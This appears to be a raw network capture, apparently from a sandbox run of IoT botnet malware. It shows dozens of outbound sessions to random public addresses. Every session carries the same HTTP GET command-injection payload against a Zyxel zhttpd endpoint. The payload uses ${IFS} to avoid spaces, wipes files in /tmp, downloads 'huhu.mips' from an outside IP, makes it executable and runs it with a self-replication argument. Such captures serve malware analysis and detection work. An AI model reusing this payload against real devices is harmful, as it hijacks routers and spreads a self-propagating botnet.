                                                      Feb 2, 2024 06:36:14.079289913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9507192.168.2.1437300153.224.131.221443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.079343081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9508192.168.2.144237095.85.46.217443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.079374075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9509192.168.2.146077898.107.69.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.079427958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9510192.168.2.1455688169.154.118.180443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.079463959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9511192.168.2.14415129.102.130.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.079489946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9512192.168.2.1444706126.229.210.15443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.079515934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9513192.168.2.1435822140.166.0.120443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.079569101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9514192.168.2.1460470139.143.0.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.079617977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9515192.168.2.1455382155.143.20.204443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.079651117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9516192.168.2.144884244.188.250.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.079699993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9517192.168.2.1433650109.250.43.68443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.079746962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9518192.168.2.1433712155.159.154.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.079782963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9519192.168.2.1444106139.125.52.80443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.079828024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9520192.168.2.1445574185.249.201.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.079869032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9521192.168.2.144532278.163.241.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.079914093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9522192.168.2.1460106136.113.147.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.079955101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9523192.168.2.145349848.198.199.97443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.080002069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9524192.168.2.1449196133.211.17.210443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.080029964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9525192.168.2.143868686.41.70.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.080082893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9526192.168.2.144454075.29.203.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.080126047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9527192.168.2.143670675.8.90.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.080173969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9528192.168.2.1451276190.110.77.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.080199957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9529192.168.2.1442158164.55.225.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.080229998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9530192.168.2.145337054.34.112.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.080260038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9531192.168.2.1456510186.42.157.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.080298901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9532192.168.2.1445976130.222.160.151443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.080327034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9533192.168.2.144087024.218.69.162443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.080359936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9534192.168.2.1453642153.36.160.138443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.080395937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9535192.168.2.1442834151.55.88.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.080447912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9536192.168.2.14475562.42.97.60443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.080488920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9537192.168.2.1454072180.219.202.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.080537081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9538192.168.2.144226898.90.139.153443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.080578089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9539192.168.2.145554236.118.33.253443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.080605030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9540192.168.2.1440536156.214.31.140443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.080655098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9541192.168.2.1450324204.95.229.76443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.080683947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9542192.168.2.144433012.17.228.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.080718994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9543192.168.2.144728876.160.122.171443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.080743074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9544192.168.2.1439410154.190.50.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.080813885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9545192.168.2.144655279.146.42.154443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.080841064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9546192.168.2.1435818178.51.200.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.080904961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9547192.168.2.145655824.12.123.20443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.080934048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9548192.168.2.1443974178.57.139.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.081039906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9549192.168.2.1457594181.51.38.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.081098080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9550192.168.2.145034834.0.18.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.081135035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9551192.168.2.1445808155.7.241.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.081167936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9552192.168.2.1453796185.179.22.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.081198931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9553192.168.2.143793643.180.125.151443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.081244946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9554192.168.2.145030240.244.222.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.081278086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9555192.168.2.143916884.195.135.151443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.081311941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9556192.168.2.1459684178.140.251.120443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.081377983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9557192.168.2.1433704188.108.203.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.081414938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9558192.168.2.14440762.39.167.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.081469059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9559192.168.2.145509812.3.69.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.081516027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9560192.168.2.143290480.27.2.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.081577063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9561192.168.2.1434646143.120.208.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.081621885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9562192.168.2.145271681.211.43.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.081677914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9563192.168.2.144555072.45.183.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.081706047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9564192.168.2.145435837.80.0.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.081729889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9565192.168.2.1447956186.8.167.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.081789970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9566192.168.2.1458028204.2.225.119443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.081825018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9567192.168.2.1435274222.34.62.20443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.081860065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9568192.168.2.145545635.77.175.185443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.081902981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9569192.168.2.1442502164.243.153.1443
                                                      TimestampBytes transferredDirectionData
